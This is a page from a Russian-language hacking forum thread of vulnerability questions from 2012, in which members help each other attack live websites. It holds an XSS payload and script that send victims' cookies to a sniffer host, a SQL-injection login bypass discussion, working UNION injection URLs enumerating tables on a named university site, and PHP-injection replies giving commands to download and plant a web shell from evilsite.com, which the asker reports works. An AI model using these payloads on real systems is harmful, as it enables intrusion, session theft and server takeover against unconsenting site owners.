HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2096 из 2438 « Первая < 10961596199620462086 2092 2093 2094 2095 2096 2097 2098 2099 2100 210621462196 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20951  
Старый 07.07.2012, 22:19
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию
Цитата:
Сообщение от WTSBugzoff  
WTSBugzoff said:
Подскажите как в vbulletin'е узнать название колонок и таблиц?
1. С помощью SQL инъекции

2. С помощью коннекта к БД
 
Ответить с цитированием

  #20952  
Старый 08.07.2012, 01:58
p1rotexn1k
Guest
Сообщений: n/a
Провел на форуме:
1377

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchp hrase=any&ordering=newest%22%20onmousemove=alert%2 8document.cookie%29%20style=position:fixed;top:0;l eft:0;width:100%;height:100%;%22
нашел пассивку вместо alert%28document.cookie%29 вставил

type=text/javascript%20src=http://мойсайт.org/script.js

Разные варианты пробовал, но все-ровно не приходят куки на сниффер, подскажите что не так, а то заколебался.

сам script.js

Цитата:
Сообщение от None  
location.href = "http://хостorg/s.gif?" + document.cookie;
location.href = "http://google.ru/"
 
Ответить с цитированием

  #20953  
Старый 08.07.2012, 09:24
KeyFound!89
Guest
Сообщений: n/a
Провел на форуме:
980

Репутация: 0
По умолчанию
Как обойти фильтрацию кавычки функцией eregi_replace ???

есть такой код:

$val){

$_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две

}

...

$rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);

>

логин\пасс вбиваются через форму и шлются POST'OM.

Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:

Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').

Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!
 
Ответить с цитированием

  #20954  
Старый 08.07.2012, 09:28
KeyFound!89
Guest
Сообщений: n/a
Провел на форуме:
980

Репутация: 0
По умолчанию
Цитата:
Сообщение от WTSBugzoff  
WTSBugzoff said:
Подскажите как в vbulletin'е узнать название колонок и таблиц?
Мы продаем или покупаем!? (С) Одесситы

Поставь воблу на локалхост и мониторь через пэхапэадмин. Сначала поглядишь на локалхосте, а когда будет sql на чужом сервере уже будешь знать имена таблиц - они стандартные для всех. Если чтото изменено (что врядли) смотри имена таблиц в информайшин схеме сервера, что своего что чужого.
 
Ответить с цитированием

  #20955  
Старый 08.07.2012, 22:02
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Помогите раскрутить MsSql

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15--+f[/COLOR][/COLOR] 
 
Ответить с цитированием

  #20956  
Старый 08.07.2012, 23:27
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
Цитата:
Сообщение от kingbeef  
kingbeef said:
Помогите раскрутить MsSql
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15--+f[/COLOR][/COLOR] 
Код:
Code:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(115)%2Bchar(101)%2Bchar(109)%2Bchar(105)%2Bchar(110)%2Bchar(97)%2Bchar(114)%2Bchar(115))--+f
в чаре первая таблица "seminars", далее выводим вторую "newsitems", тоже переводим ее в чар и через запятую добавляем, также надо будет делать и с колонками ))
 
Ответить с цитированием

  #20957  
Старый 08.07.2012, 23:52
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to kingbeef

Не надо страдать ерундой и загонять в char... Все и так нормально работает.

Код:
Code:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name+not+in+('seminars','newsitems')--+f
 
Ответить с цитированием

  #20958  
Старый 09.07.2012, 00:31
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию
php-injection

В общем нашел сайт с уязвимостью php-injection (через POST) в поле

Как мне:

1) Вывести содержание какого-либо файла например index.php

2) Как залить shell?

Работают только подобные команды:

${@print(phpversion())} Результат: 4.4.9

${@print(php_uname())} Результат: FreeBSD fe45.hc.ru 8.2-RELEASE-p4 FreeBSD 8.2-RELEASE-p4 #0: Wed Oct 12 17:05:45 UTC 2011 root@tinderbox1.infra.hostcomm.ru:/usr/obj/i386/usr/src/sys/FE i386

${@print(mysql_get_client_info())} Результат: 4.1.25

${@print(mysql_get_server_info())} Результат: 4.1.25-log

${@print(mysql_list_dbs())} Результат: Resource id #612

${@print(phpinfo(INFO_GENERAL))} Результат (таблица) Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/php4/etc/php' '--disable-all' '--program-prefix=' '--enable-discard-path' '--with-regex=php' '--enable-zend-multibyte' '--prefix=/usr/local/php4' '--mandir=/usr/local/php4/man' '--infodir=/usr/local/php4/info/' '--build=i386-portbld-freebsd8.2'

и т.д.
 
Ответить с цитированием

  #20959  
Старый 09.07.2012, 00:46
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to kacergei

Ну так используйте вместо print(), include() или require(), заливать шелл можно через file_put_contents('shell.php',file_get_contents('h ttp://evilsite.com/shell.txt')), copy('http://evilsite.com/shell.txt', 'shell.php') или в system('wget -O shell.php http://evilsite.com/shell.txt'). Собственно вариантов еще много, есть из чего выбирать
 
Ответить с цитированием

  #20960  
Старый 09.07.2012, 01:05
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию
Цитата:
Сообщение от cat1vo  
cat1vo said:
to
kacergei
Ну так используйте вместо
print()
,
include()
или
require()
, заливать шелл можно через
file_put_contents('shell.php',file_get_contents('h ttp://evilsite.com/shell.txt'))
,
copy('http://evilsite.com/shell.txt', 'shell.php')
или в
system('wget -O shell.php http://evilsite.com/shell.txt')
. Собственно вариантов еще много, есть из чего выбирать
Спасибо всё работает)
 
Ответить с цитированием
Ответ
Страница 2096 из 2438 « Первая < 10961596199620462086 2092 2093 2094 2095 2096 2097 2098 2099 2100 210621462196 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ